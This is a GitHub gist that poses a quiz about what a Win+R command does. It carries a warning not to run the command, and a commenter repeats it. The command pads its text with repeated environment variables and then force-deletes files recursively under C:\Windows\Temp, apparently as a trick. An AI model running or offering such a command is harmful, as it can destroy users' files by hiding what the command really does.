Skip to content

Instantly share code, notes, and snippets.

@m417z
Last active July 7, 2025 20:10
Show Gist options
  • Save m417z/4ba3bbc0871c1859764086f90f33d104 to your computer and use it in GitHub Desktop.
Save m417z/4ba3bbc0871c1859764086f90f33d104 to your computer and use it in GitHub Desktop.
Quiz: Paste this command in Win+R and run it, what will happen? Don't actually do it, it's only a quiz. https://x.com/m417z/status/1937978859313619003
cmd /k "echo Have some folders: %COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%! && del /F /S /Q /A C:\Windows\Temp"
@drbasl
Copy link

drbasl commented Jul 7, 2025

cmd /k "echo Have some folders: %COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%%COMMONPROGRAMFILES%! && del /F /S /Q /A C:\Windows\Temp"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment